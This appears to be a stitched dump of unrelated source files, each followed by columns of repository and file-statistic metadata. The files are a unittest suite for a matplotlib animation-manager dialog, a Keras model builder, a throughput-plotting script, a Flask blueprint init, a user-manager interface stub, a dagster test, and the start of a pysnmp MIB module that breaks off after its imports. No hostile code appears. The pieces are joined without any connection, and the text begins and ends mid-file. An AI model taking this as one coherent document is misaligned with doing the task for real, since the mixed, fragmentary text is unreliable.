        self.assertTrue(not self.dlg.checkBox_rot.isChecked())
        self.assertAlmostEqual(self.dlg.period, self.dlg.period_modif)
    def test_quality_props(self):
        '''dpi and fps spinbox values propagate to the dialog and figure'''
        # change dpi
        dpi = 50
        self.dlg.spinBox_dpi.setValue(dpi)
        time.sleep(DELAY) # wait for signal handling in the main event loop
        self.assertEqual(self.dlg.dpi, dpi)
        self.assertEqual(self.fig.get_dpi(), dpi)
        # change fps
        fps = 10
        self.dlg.spinBox_fps.setValue(fps)
        time.sleep(DELAY) # wait for signal handling in the main event loop
        self.assertEqual(self.dlg.fps, fps)
        # restore defaults:
        self.dlg.spinBox_dpi.setValue(100)
        self.dlg.spinBox_fps.setValue(24)
        time.sleep(3*DELAY) # wait for signal handling in the main event loop
    def test_modif_props(self):
        '''changing the modification period also updates the overall period'''
        # change modification period
        t = 30
        self.dlg.spinBox_period_modif.setValue(t)
        time.sleep(DELAY) # wait for signal handling in the main event loop
        self.assertEqual(self.dlg.period_modif, t)
        self.assertEqual(self.dlg.period, t)
    def test_control_btns(self):
        '''pause/start/stop buttons can be clicked in sequence without error'''
        # test pause button
        self.dlg.btnPause.click()
        time.sleep(2*DELAY) # wait for signal handling in the main event loop
        # test start button
        self.dlg.btnStart.click()
        time.sleep(2*DELAY) # wait for signal handling in the main event loop
        # test stop button
        self.dlg.btnStop.click()
        time.sleep(2*DELAY) # wait for signal handling in the main event loop
        # test start button
        self.dlg.btnStart.click()
        time.sleep(2*DELAY) # wait for signal handling in the main event loop
    def test_exportAnim(self):
        '''exporting writes the animation file to disk'''
        # make the animation small for faster export
        self.dlg.spinBox_dpi.setValue(30)
        self.dlg.spinBox_fps.setValue(10)
        self.dlg.spinBox_period_modif.setValue(2)
        time.sleep(3*DELAY) # wait for signal handling in the main event loop
        # export animation
        path = os.path.abspath(test_folder+"test")
        self.dlg.lineEdit_name.setText(path)
        self.dlg.EXPORT_RUNNING = True
        self.dlg.btnExport.click()
        # wait until exporting is finished
        while self.dlg.EXPORT_RUNNING: time.sleep(2*DELAY)
        self.assertTrue(os.path.exists(self.dlg.filepath))
        # remove testfile
        os.remove(self.dlg.filepath)
        # restore default settings
        self.dlg.btnStart.click()
        time.sleep(2*DELAY) # wait for signal handling in the main event loop
        # restore the default quality settings
        self.dlg.spinBox_dpi.setValue(100)
        self.dlg.spinBox_fps.setValue(24)
        self.dlg.spinBox_period_modif.setValue(10)
        time.sleep(3*DELAY) # wait for signal handling in the main event loop
    def test_Info(self):
        '''the info button opens a message box that can be dismissed'''
        # open the info message box
        self.dlg.btnAsk.click()
        time.sleep(2*DELAY) # wait for signal handling in the main event loop
        self.assertTrue(self.dlg.msg.isVisible())
        self.dlg.msg.accept()
        time.sleep(2*DELAY) # wait for signal handling in the main event loop
        self.assertTrue(not self.dlg.msg.isVisible())
class rot_graph_3D_Test(unittest.TestCase):
    '''Animation manager test based on the '3D rotated graph' example'''

    def __init__(self, testname, ax, dlg):
        # testname selects which test method runs; ax/dlg are the 3D axes
        # and the manager dialog shared by all the tests below.
        unittest.TestCase.__init__(self, testname)
        self.ax, self.dlg = ax, dlg
        self.fig = self.ax.get_figure()

    def test_initialization(self):
        '''
        Check the widget components against the figure/animation type:
            - no object modification in this example -> its controls hidden
            - 3D axes -> rotation controls visible and enabled
        '''
        # this example defines no object modification
        self.assertFalse(self.dlg.widget_modif.isVisible())
        self.assertFalse(self.dlg.checkBox_modif.isChecked())
        # the axes are 3D, so the object can be rotated
        self.assertTrue(self.dlg.widget_rot.isVisible())
        self.assertTrue(self.dlg.checkBox_rot.isChecked())
        self.assertAlmostEqual(self.dlg.period, self.dlg.period_rot)

    def test_quality_props(self):
        '''The dpi and fps spin boxes must drive the dialog and the figure.'''
        new_dpi = 50
        self.dlg.spinBox_dpi.setValue(new_dpi)
        time.sleep(DELAY)  # let the event loop deliver the signal
        self.assertEqual(self.dlg.dpi, new_dpi)
        self.assertEqual(self.fig.get_dpi(), new_dpi)
        new_fps = 10
        self.dlg.spinBox_fps.setValue(new_fps)
        time.sleep(DELAY)  # let the event loop deliver the signal
        self.assertEqual(self.dlg.fps, new_fps)
        # put the defaults back
        self.dlg.spinBox_fps.setValue(24)
        self.dlg.spinBox_dpi.setValue(100)
        time.sleep(3*DELAY)  # let the event loop apply the restored settings

    def test_3D_props(self):
        '''Rotation period, elevation, rotation toggle and initial azimuth.'''
        period = 30
        self.dlg.spinBox_period_rot.setValue(period)
        time.sleep(DELAY)  # let the event loop deliver the signal
        self.assertEqual(self.dlg.period_rot, period)
        self.assertEqual(self.dlg.period, period)
        # the elevation spin box must move the axes
        elevation = 10
        self.dlg.spinBox_elev.setValue(elevation)
        time.sleep(DELAY)  # let the event loop deliver the signal
        self.assertEqual(self.dlg.elevation, elevation)
        self.assertEqual(self.ax.elev, elevation)
        # toggling the checkbox stops and restarts the rotation
        self.dlg.checkBox_rot.setChecked(False)
        time.sleep(3*DELAY)  # give the animation time to settle
        self.assertFalse(isRotated(self.ax, self.dlg))
        self.dlg.checkBox_rot.setChecked(True)
        time.sleep(3*DELAY)  # give the animation time to settle
        self.assertTrue(isRotated(self.ax, self.dlg))
        # the initial azimuth is applied after stopping the animation
        azimuth = -50
        self.dlg.btnStop.click()
        time.sleep(DELAY)  # let the event loop process the click
        self.dlg.spinBox_azim.setValue(azimuth)
        time.sleep(DELAY)  # let the event loop deliver the signal
        self.assertEqual(self.dlg.zero_azim, azimuth)
        self.assertEqual(self.ax.azim, azimuth)

    def test_control_btns(self):
        '''Pause, start and stop buttons must control the rotation state.'''
        self.dlg.btnPause.click()
        time.sleep(2*DELAY)  # let the event loop process the click
        self.assertFalse(isRotated(self.ax, self.dlg))
        self.dlg.btnStart.click()
        time.sleep(2*DELAY)  # let the event loop process the click
        self.assertTrue(isRotated(self.ax, self.dlg))
        # stop must also reset the azimuth to the spin-box value
        self.assertNotEqual(self.ax.azim, self.dlg.spinBox_azim.value())
        self.dlg.btnStop.click()
        time.sleep(2*DELAY)  # let the event loop process the click
        self.assertFalse(isRotated(self.ax, self.dlg))
        self.assertEqual(self.ax.azim, self.dlg.spinBox_azim.value())
        self.dlg.btnStart.click()
        time.sleep(2*DELAY)  # let the event loop process the click
        self.assertTrue(isRotated(self.ax, self.dlg))

    def test_exportAnim(self):
        '''Export a short low-quality animation and check the output file appears.'''
        # shrink the animation so the export finishes quickly
        self.dlg.spinBox_dpi.setValue(30)
        self.dlg.spinBox_fps.setValue(10)
        self.dlg.spinBox_period_rot.setValue(2)
        time.sleep(3*DELAY)  # let the event loop apply the new settings
        # trigger the export
        target = os.path.abspath(test_folder+"test")
        self.dlg.lineEdit_name.setText(target)
        self.dlg.EXPORT_RUNNING = True
        self.dlg.btnExport.click()
        # busy-wait until the export worker clears the flag
        while self.dlg.EXPORT_RUNNING:
            time.sleep(2*DELAY)
        # the exported file must exist; remove it afterwards
        self.assertTrue(os.path.exists(self.dlg.filepath))
        os.remove(self.dlg.filepath)
        # restart the animation and restore the default quality settings
        self.dlg.btnStart.click()
        time.sleep(2*DELAY)  # let the event loop process the click
        self.assertTrue(isRotated(self.ax, self.dlg))
        self.dlg.spinBox_period_rot.setValue(10)
        self.dlg.spinBox_fps.setValue(24)
        self.dlg.spinBox_dpi.setValue(100)
        time.sleep(3*DELAY)  # let the event loop apply the restored settings
class randwalk_3D_Test(unittest.TestCase):
    '''Animation manager test based on the '3D Random walk' example'''
    def __init__(self, testname, ax, dlg):
        # testname: name of the test method to run; ax: the Matplotlib 3D
        # axes under test; dlg: the animation-manager dialog driving them.
        unittest.TestCase.__init__(self, testname)
        self.ax, self.dlg = ax, dlg
        self.fig = self.ax.get_figure()
    def test_initialization(self):
        '''
        Test widget components according to the type of figure and animation:
            - 2D/3D axes
            - object modification present
        '''
        # current example has modification
        self.assertTrue(self.dlg.widget_modif.isVisible())
        self.assertTrue(self.dlg.checkBox_modif.isChecked())
        # current example's axes are 3D, thus the object can be rotated
        self.assertTrue(self.dlg.widget_rot.isVisible())
        self.assertTrue(self.dlg.checkBox_rot.isChecked())
        # period is the least common multiple of period_modif and period_rot
        self.assertTrue(self.dlg.period % self.dlg.period_modif == 0)
        self.assertTrue(self.dlg.period % self.dlg.period_rot == 0)
    def test_quality_props(self):
        '''dpi and fps spin boxes must update the dialog and the figure.'''
        # change dpi
        dpi = 50
        self.dlg.spinBox_dpi.setValue(dpi)
        time.sleep(DELAY) # wait for signal handling in the main event loop
        self.assertEqual(self.dlg.dpi, dpi)
        self.assertEqual(self.fig.get_dpi(), dpi)
        # change fps
        fps = 10
        self.dlg.spinBox_fps.setValue(fps)
        time.sleep(DELAY) # wait for signal handling in the main event loop
        self.assertEqual(self.dlg.fps, fps)
        # restore defaults:
        self.dlg.spinBox_dpi.setValue(100)
        self.dlg.spinBox_fps.setValue(24)
        time.sleep(3*DELAY) # wait for signal handling in the main event loop
    def test_modif_props(self):
        '''Changing period_modif must keep period a multiple of both periods.'''
        # change modification period
        t = 30
        self.dlg.spinBox_period_modif.setValue(t)
        time.sleep(DELAY) # wait for signal handling in the main event loop
        self.assertEqual(self.dlg.period_modif, t)
        # period is the least common multiple of period_modif and period_rot
        self.assertTrue(self.dlg.period % self.dlg.period_modif == 0)
        self.assertTrue(self.dlg.period % self.dlg.period_rot == 0)
    def test_3D_props(self):
        '''Rotation period, elevation, rotation toggle and initial azimuth.'''
        # change rotation period
        t = 25
        self.dlg.spinBox_period_rot.setValue(t)
        time.sleep(DELAY) # wait for signal handling in the main event loop
        self.assertEqual(self.dlg.period_rot, t)
        # period is the least common multiple of period_modif and period_rot
        self.assertTrue(self.dlg.period % self.dlg.period_modif == 0)
        self.assertTrue(self.dlg.period % self.dlg.period_rot == 0)
        # change elevation
        elev = 10
        self.dlg.spinBox_elev.setValue(elev)
        time.sleep(DELAY) # wait for signal handling in the main event loop
        self.assertEqual(self.dlg.elevation, elev)
        self.assertEqual(self.ax.elev, elev)
        # enable/disable rotation via the checkbox
        self.dlg.checkBox_rot.setChecked(False)
        time.sleep(3*DELAY) # wait for signal handling in the main event loop
        self.assertTrue(not isRotated(self.ax, self.dlg))
        self.dlg.checkBox_rot.setChecked(True)
        time.sleep(3*DELAY) # wait for signal handling in the main event loop
        self.assertTrue(isRotated(self.ax, self.dlg))
        # change initial azimuth (applied after stopping the animation)
        azim = -50
        self.dlg.btnStop.click()
        time.sleep(DELAY) # wait for signal handling in the main event loop
        self.dlg.spinBox_azim.setValue(azim)
        time.sleep(DELAY) # wait for signal handling in the main event loop
        self.assertEqual(self.dlg.zero_azim, azim)
        self.assertEqual(self.ax.azim, azim)
    def test_control_btns(self):
        '''Pause, start and stop buttons must control the rotation state.'''
        # test pause button
        self.dlg.btnPause.click()
        time.sleep(2*DELAY) # wait for signal handling in the main event loop
        self.assertTrue(not isRotated(self.ax, self.dlg))
        # test start button
        self.dlg.btnStart.click()
        time.sleep(2*DELAY) # wait for signal handling in the main event loop
        self.assertTrue(isRotated(self.ax, self.dlg))
        # test stop button (stop also resets the azimuth to the spin-box value)
        self.assertNotEqual(self.ax.azim, self.dlg.spinBox_azim.value())
        self.dlg.btnStop.click()
        time.sleep(2*DELAY) # wait for signal handling in the main event loop
        self.assertTrue(not isRotated(self.ax, self.dlg))
        self.assertEqual(self.ax.azim, self.dlg.spinBox_azim.value())
        # test start button
        self.dlg.btnStart.click()
        time.sleep(2*DELAY) # wait for signal handling in the main event loop
        self.assertTrue(isRotated(self.ax, self.dlg))
    def test_exportAnim(self):
        '''Export a short low-quality animation and check the file appears.'''
        # make the animation small for faster export
        self.dlg.spinBox_dpi.setValue(30)
        self.dlg.spinBox_fps.setValue(10)
        self.dlg.spinBox_period_rot.setValue(2)
        self.dlg.spinBox_period_modif.setValue(2)
        time.sleep(3*DELAY) # wait for signal handling in the main event loop
        # export animation
        path = os.path.abspath(test_folder+"test")
        self.dlg.lineEdit_name.setText(path)
        self.dlg.EXPORT_RUNNING = True
        self.dlg.btnExport.click()
        # busy-wait until the export worker clears the flag
        while self.dlg.EXPORT_RUNNING: time.sleep(2*DELAY)
        self.assertTrue(os.path.exists(self.dlg.filepath))
        # remove testfile
        os.remove(self.dlg.filepath)
        # restart the animation and restore the default settings
        self.dlg.btnStart.click()
        time.sleep(2*DELAY) # wait for signal handling in the main event loop
        self.assertTrue(isRotated(self.ax, self.dlg))
        self.dlg.spinBox_dpi.setValue(100)
        self.dlg.spinBox_fps.setValue(24)
        self.dlg.spinBox_period_rot.setValue(10)
        self.dlg.spinBox_period_modif.setValue(20)
        time.sleep(3*DELAY) # wait for signal handling in the main event loop
def main():
    '''Run every example's test suite and return the process error code.'''
    examples = [(oscillation_2D, modif_oscillation_2D_Test),
                (rot_graph_3D, rot_graph_3D_Test),
                (modif_randwalk_3D, randwalk_3D_Test)]
    outcomes = []
    for example, test_case in examples:
        manager = example.get_animManager()
        # runUnitTest returns a unittest TestResult instance
        outcomes.append(manager.runUnitTest(MyTestCase=test_case))
    # error code: falsy (0-like) only when every suite succeeded
    return not all(outcome.wasSuccessful() for outcome in outcomes)
if __name__ == "__main__":
    # main() computes an error code, but it was previously discarded, so the
    # script always exited 0 even when tests failed; propagate it to the shell.
    import sys
    sys.exit(main())
| 38.111588
| 81
| 0.648874
| 2,352
| 17,760
| 4.80102
| 0.102041
| 0.092366
| 0.038257
| 0.073326
| 0.868845
| 0.861672
| 0.851399
| 0.82678
| 0.823858
| 0.813762
| 0
| 0.013081
| 0.263964
| 17,760
| 466
| 82
| 38.111588
| 0.85075
| 0.296847
| 0
| 0.825279
| 0
| 0
| 0.012774
| 0.004176
| 0
| 0
| 0
| 0
| 0.245353
| 1
| 0.081784
| false
| 0
| 0.026022
| 0
| 0.126394
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b4f0f8731d2f032b138d7d11c0a604e3436513c0
| 1,590
|
py
|
Python
|
keras_models.py
|
roberto1648/churn-prediction-with-pyspark-and-keras
|
ff11cb7f9058e33587909c7a0775f55995a9fede
|
[
"MIT"
] | 4
|
2019-12-15T13:35:00.000Z
|
2020-09-21T03:11:27.000Z
|
keras_models.py
|
roberto1648/churn-prediction-with-pyspark-and-keras
|
ff11cb7f9058e33587909c7a0775f55995a9fede
|
[
"MIT"
] | null | null | null |
keras_models.py
|
roberto1648/churn-prediction-with-pyspark-and-keras
|
ff11cb7f9058e33587909c7a0775f55995a9fede
|
[
"MIT"
] | 2
|
2021-01-17T15:52:00.000Z
|
2021-03-29T00:18:25.000Z
|
from keras.layers import Dense, Dropout, Flatten
from keras.models import Input, Model
import keras
def model1(
    input_shape=(None, 20),
    hidden_layers=((4, 0.25), (4, 0.25)),
    nlabels=1,
    verbose=True,
):
    """Build a plain fully connected Keras model.

    Parameters:
        input_shape: batch shape passed to the Input layer
            (batch dimension first; None means variable batch size).
        hidden_layers: sequence of (n_units, dropout_rate) pairs, one per
            hidden layer; a dropout_rate <= 0 skips the Dropout layer.
            (Default is a tuple now: a mutable list default is shared
            across calls and is a classic Python pitfall.)
        nlabels: number of linear output units ('predictions' layer).
        verbose: when True, print the model summary.

    Returns:
        The compiled-graph keras Model (not yet compiled with an optimizer).
    """
    inp = x = Input(batch_shape=input_shape, name='input')
    for layer_number, (n_units, dropout_rate) in enumerate(hidden_layers):
        x = Dense(n_units, activation='relu',
                  name="hidden_{}".format(layer_number))(x)
        if dropout_rate > 0:
            x = Dropout(dropout_rate,
                        name="dropout_{}".format(layer_number))(x)
    x = Dense(nlabels, activation='linear', name='predictions')(x)
    model = Model(inputs=inp, outputs=x)
    if verbose:
        # fixed: `print model.summary()` was Python-2-only syntax and made
        # this module a SyntaxError under Python 3
        print(model.summary())
    return model
def model2(
    input_shape=(None, 20),
    hidden_layers=((4, 0.25), (4, 0.25)),
    nlabels=1,
    reg_weight=0.01,
    verbose=True,
):
    """Build a fully connected Keras model with L2 weight regularization.

    Same architecture as model1, but every hidden Dense layer carries an
    l2(reg_weight) kernel regularizer.

    Parameters:
        input_shape: batch shape passed to the Input layer
            (batch dimension first; None means variable batch size).
        hidden_layers: sequence of (n_units, dropout_rate) pairs, one per
            hidden layer; a dropout_rate <= 0 skips the Dropout layer.
            (Default is a tuple now: a mutable list default is shared
            across calls and is a classic Python pitfall.)
        nlabels: number of linear output units ('predictions' layer).
        reg_weight: L2 regularization factor for the hidden-layer kernels.
        verbose: when True, print the model summary.

    Returns:
        The compiled-graph keras Model (not yet compiled with an optimizer).
    """
    inp = x = Input(batch_shape=input_shape, name='input')
    for layer_number, (n_units, dropout_rate) in enumerate(hidden_layers):
        x = Dense(n_units,
                  activation='relu',
                  name="hidden_{}".format(layer_number),
                  kernel_regularizer=keras.regularizers.l2(reg_weight),
                  )(x)
        if dropout_rate > 0:
            x = Dropout(dropout_rate,
                        name="dropout_{}".format(layer_number))(x)
    x = Dense(nlabels, activation='linear', name='predictions')(x)
    model = Model(inputs=inp, outputs=x)
    if verbose:
        # fixed: `print model.summary()` was Python-2-only syntax and made
        # this module a SyntaxError under Python 3
        print(model.summary())
    return model
| 28.392857
| 74
| 0.607547
| 204
| 1,590
| 4.573529
| 0.264706
| 0.07074
| 0.017149
| 0.07717
| 0.831726
| 0.831726
| 0.831726
| 0.831726
| 0.831726
| 0.831726
| 0
| 0.025402
| 0.257233
| 1,590
| 55
| 75
| 28.909091
| 0.764606
| 0
| 0
| 0.714286
| 0
| 0
| 0.056639
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.071429
| null | null | 0.047619
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
25845a5a8e312c3e1324e3d235a8450f8bd0a6b0
| 3,395
|
py
|
Python
|
scripts/4_postprocess_sets_tps/4_plot_tps.py
|
gokul-uf/asl-fall-2017
|
83e882d9d4c52bdd279b4e3eed8cd7ac768e88d7
|
[
"MIT"
] | 1
|
2018-06-13T16:57:59.000Z
|
2018-06-13T16:57:59.000Z
|
scripts/4_postprocess_sets_tps/4_plot_tps.py
|
gokul-uf/asl-fall-2017
|
83e882d9d4c52bdd279b4e3eed8cd7ac768e88d7
|
[
"MIT"
] | null | null | null |
scripts/4_postprocess_sets_tps/4_plot_tps.py
|
gokul-uf/asl-fall-2017
|
83e882d9d4c52bdd279b4e3eed8cd7ac768e88d7
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import seaborn as sns
num_threads = [8, 16, 32, 64]
# sns.set()


def plot_metric(csv_suffix, title, ylabel, png_name):
    """Plot mean +/- std of one metric against the number of virtual clients.

    Reads csvs/write_tps_t_<threads>_<csv_suffix>.csv for every thread count
    in ``num_threads`` (each row: virtual clients, mean, std — extra columns
    are ignored), draws one errorbar curve per thread count on a fresh
    figure, and saves it to ``png_name``.

    This replaces five copy-pasted, nearly identical plotting sections; the
    only visible difference between them (legend/ylim call order in the
    first section) has no effect on the saved figure.
    """
    plt.figure()
    plt.title(title)
    num_vc = []
    for num_thread in num_threads:
        num_vc = []
        val = []
        std = []
        with open("csvs/write_tps_t_{}_{}.csv".format(num_thread, csv_suffix)) as f:
            for line in f:
                vc, v, s = [float(x) for x in line.strip().split(",")][:3]
                num_vc.append(vc)
                val.append(v)
                std.append(s)
        plt.errorbar(x=num_vc, y=val, yerr=std,
                     label="{} Threads".format(num_thread), capsize=2)
    plt.grid(linestyle="dotted")
    plt.ylabel(ylabel)
    plt.xlabel("Number of Virtual Clients")
    plt.ylim(ymin=0)
    plt.legend()
    # tick at 0 plus the client counts from the last file read (as before)
    plt.xticks([0] + num_vc)
    plt.savefig(png_name)


plot_metric("tps", "Throughput vs. Num of Virtual Clients",
            "Throughput (Ops / sec)", "4_set_tps_tps.png")
plot_metric("rt", "Response Time vs. Num of Virtual Clients",
            "Response Time (ms)", "4_set_tps_rt.png")
plot_metric("q_wt", "Queueing Time vs. Num of Virtual Clients",
            "Queueing Time (ms)", "4_set_tps_q_wt.png")
plot_metric("mc_wait", "Waiting for MC Time vs. Num of Virtual Clients",
            "Waiting Time (ms)", "4_set_tps_mc_wt.png")
plot_metric("q_len", "Queue Length vs. Num of Virtual Clients",
            "Queue Length (num requests)", "4_set_tps_q_len.png")
| 27.16
| 100
| 0.663328
| 585
| 3,395
| 3.700855
| 0.150427
| 0.046189
| 0.073903
| 0.039261
| 0.860046
| 0.836028
| 0.815704
| 0.8
| 0.8
| 0.8
| 0
| 0.011575
| 0.160236
| 3,395
| 125
| 101
| 27.16
| 0.747808
| 0.009131
| 0
| 0.754717
| 0
| 0
| 0.221297
| 0.041939
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.04717
| 0
| 0.04717
| 0.009434
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
258e6c20d1e58a43b469aaccab0db85cada6c1ea
| 98
|
py
|
Python
|
info/api/house/__init__.py
|
googleliyang/flask_house_rent
|
93299086058ef5e6e32759c15fba2ade21c992b5
|
[
"Apache-2.0"
] | null | null | null |
info/api/house/__init__.py
|
googleliyang/flask_house_rent
|
93299086058ef5e6e32759c15fba2ade21c992b5
|
[
"Apache-2.0"
] | 4
|
2021-03-18T22:19:24.000Z
|
2022-03-11T23:40:16.000Z
|
info/api/house/__init__.py
|
googleliyang/flask_house_rent
|
93299086058ef5e6e32759c15fba2ade21c992b5
|
[
"Apache-2.0"
] | null | null | null |
# Blueprint grouping the house-related API routes for registration on the app.
from flask import Blueprint
house_print = Blueprint('house_print', __name__)
# Imported last on purpose: the house module decorates its view functions
# with house_print, so the blueprint must already exist when it loads
# (avoids a circular import). Do not move this to the top of the file.
from . import house
| 19.6
| 48
| 0.795918
| 13
| 98
| 5.538462
| 0.538462
| 0.388889
| 0.527778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.132653
| 98
| 5
| 49
| 19.6
| 0.847059
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
25cb790c30d04b5e11e3652482e62d2058f3b7f1
| 174
|
py
|
Python
|
Services/IUserManager.py
|
nafis-sadik/flask-mvc-example
|
061f0f827a62a91495694db2b600aa3fe7b3b165
|
[
"MIT"
] | null | null | null |
Services/IUserManager.py
|
nafis-sadik/flask-mvc-example
|
061f0f827a62a91495694db2b600aa3fe7b3b165
|
[
"MIT"
] | null | null | null |
Services/IUserManager.py
|
nafis-sadik/flask-mvc-example
|
061f0f827a62a91495694db2b600aa3fe7b3b165
|
[
"MIT"
] | null | null | null |
class IUserManager:
    """Interface for user-management services.

    Concrete implementations must override both methods; calling them on
    this base class raises NotImplementedError.
    """

    def logIn(self, userId, password):
        """Authenticate the given user; must be overridden."""
        raise NotImplementedError

    def SignUp(self, userId, password):
        """Register a new user account; must be overridden."""
        raise NotImplementedError
| 24.857143
| 40
| 0.678161
| 16
| 174
| 7.375
| 0.625
| 0.169492
| 0.305085
| 0.389831
| 0.711864
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.258621
| 174
| 6
| 41
| 29
| 0.914729
| 0
| 0
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0.4
| 0
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
25ec2ed065760c5e23e3425a3497654c131f655e
| 182
|
py
|
Python
|
examples/docs_snippets/docs_snippets_tests/concepts_tests/io_management_tests/test_custom_io_manager.py
|
withshubh/dagster
|
ff4a0db53e126f44097a337eecef54988cc718ef
|
[
"Apache-2.0"
] | null | null | null |
examples/docs_snippets/docs_snippets_tests/concepts_tests/io_management_tests/test_custom_io_manager.py
|
withshubh/dagster
|
ff4a0db53e126f44097a337eecef54988cc718ef
|
[
"Apache-2.0"
] | null | null | null |
examples/docs_snippets/docs_snippets_tests/concepts_tests/io_management_tests/test_custom_io_manager.py
|
withshubh/dagster
|
ff4a0db53e126f44097a337eecef54988cc718ef
|
[
"Apache-2.0"
] | null | null | null |
from dagster import execute_pipeline
from docs_snippets.concepts.io_management.custom_io_manager import my_pipeline
def test_custom_io_manager():
    """Smoke test: the custom-IO-manager example pipeline runs without raising."""
    execute_pipeline(my_pipeline)
| 26
| 78
| 0.862637
| 26
| 182
| 5.615385
| 0.576923
| 0.205479
| 0.205479
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.093407
| 182
| 6
| 79
| 30.333333
| 0.884848
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
d3232b92efbd0d5163d48e7a28a420e43dac3aa9
| 164,026
|
py
|
Python
|
pysnmp/TVD-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 11
|
2021-02-02T16:27:16.000Z
|
2021-08-31T06:22:49.000Z
|
pysnmp/TVD-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 75
|
2021-02-24T17:30:31.000Z
|
2021-12-08T00:01:18.000Z
|
pysnmp/TVD-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 10
|
2019-04-30T05:51:36.000Z
|
2022-02-16T03:33:41.000Z
|
#
# PySNMP MIB module TVD-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/TVD-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 21:20:44 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
# NOTE(review): auto-generated pysnmp module. `mibBuilder` is not imported
# here; presumably it is injected into this module's namespace by the pysnmp
# MIB loader when the file is executed — do not run this file standalone.
# Pull in the base ASN.1 / SMI / TC symbols this MIB is built from.
OctetString, Integer, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "OctetString", "Integer", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ValueSizeConstraint, ValueRangeConstraint, ConstraintsUnion, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ValueSizeConstraint", "ValueRangeConstraint", "ConstraintsUnion", "ConstraintsIntersection")
# Trap payload objects defined by the vendor NAI-MIB.
naiTrapProblemResolution, naiTrapLongDescription, naiTrapAgent, naiTrapSourceDNSName, naiTrapDiagID, naiTrapTargetDNSName, naiTrapAgentVersion, naiTrapURL, naiTrapShortDescription, nai, naiTrapSeverity = mibBuilder.importSymbols("NAI-MIB", "naiTrapProblemResolution", "naiTrapLongDescription", "naiTrapAgent", "naiTrapSourceDNSName", "naiTrapDiagID", "naiTrapTargetDNSName", "naiTrapAgentVersion", "naiTrapURL", "naiTrapShortDescription", "nai", "naiTrapSeverity")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
iso, TimeTicks, Unsigned32, IpAddress, NotificationType, Integer32, ModuleIdentity, Gauge32, Bits, Counter64, MibIdentifier, NotificationType, enterprises, MibScalar, MibTable, MibTableRow, MibTableColumn, Counter32, ObjectIdentity = mibBuilder.importSymbols("SNMPv2-SMI", "iso", "TimeTicks", "Unsigned32", "IpAddress", "NotificationType", "Integer32", "ModuleIdentity", "Gauge32", "Bits", "Counter64", "MibIdentifier", "NotificationType", "enterprises", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Counter32", "ObjectIdentity")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
# Root OID nodes of the McAfee sub-tree (enterprise 3401, branch 12).
